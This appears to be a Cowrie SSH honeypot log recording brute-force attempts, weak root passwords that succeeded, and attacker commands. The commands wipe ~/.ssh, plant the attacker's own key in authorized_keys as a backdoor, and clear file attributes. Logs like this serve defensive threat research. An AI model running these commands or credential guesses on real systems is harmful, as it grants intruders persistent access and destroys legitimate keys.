{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:57:36.694605Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:57:36.949425Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:36.950415Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":33148,"dst_ip":"1.2.3.4","dst_port":22,"session":"498bf9f51f20","protocol":"ssh","message":"New connection: 182.18.161.165:33148 (1.2.3.4:22) [session: 498bf9f51f20]","sensor":"my-vps","timestamp":"2025-09-08T23:57:37.197113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:37.198223Z","src_ip":"182.18.161.165","session":"498bf9f51f20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:37.453828Z","src_ip":"182.18.161.165","session":"498bf9f51f20"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:38.514799Z","src_ip":"182.18.161.165","session":"498bf9f51f20"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:39.772979Z","src_ip":"182.18.161.165","session":"498bf9f51f20"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":40224,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e602c199947","protocol":"ssh","message":"New connection: 182.18.161.165:40224 (1.2.3.4:22) [session: 4e602c199947]","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.024093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.025003Z","src_ip":"182.18.161.165","session":"4e602c199947"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.278354Z","src_ip":"182.18.161.165","session":"4e602c199947"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":43480,"dst_ip":"1.2.3.4","dst_port":22,"session":"b03f3b872c78","protocol":"ssh","message":"New connection: 139.19.117.131:43480 (1.2.3.4:22) [session: b03f3b872c78]","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.751352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.753930Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":35172,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d724f4497b5","protocol":"ssh","message":"New connection: 46.101.8.63:35172 (1.2.3.4:22) [session: 9d724f4497b5]","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.761065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.761865Z","src_ip":"46.101.8.63","session":"9d724f4497b5"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.770522Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.784642Z","src_ip":"46.101.8.63","session":"9d724f4497b5"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.805530Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.806122Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.826070Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.827054Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.login.failed","username":"white","password":"!","message":"login attempt [white/!] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:40.917928Z","src_ip":"46.101.8.63","session":"9d724f4497b5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:57:41.331239Z","src_ip":"182.18.161.165","session":"4e602c199947"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:41.585666Z","src_ip":"182.18.161.165","session":"4e602c199947"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:41.593290Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:41.943297Z","src_ip":"46.101.8.63","session":"9d724f4497b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:50.102399Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.session.closed","duration":180.15240669250488,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:50.107689Z","src_ip":"212.227.125.160","session":"eeeb75871464"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:50.751564Z","src_ip":"139.19.117.131","session":"b03f3b872c78"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":50100,"dst_ip":"1.2.3.4","dst_port":22,"session":"4953a9f42751","protocol":"ssh","message":"New connection: 45.150.34.92:50100 (1.2.3.4:22) [session: 4953a9f42751]","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.315214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.316174Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.333753Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.login.success","username":"root","password":"zhiyuan","message":"login attempt [root/zhiyuan] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.444419Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:57:53.500256Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.501009Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.501847Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.520487Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:57:53.663725Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.664458Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.683886Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
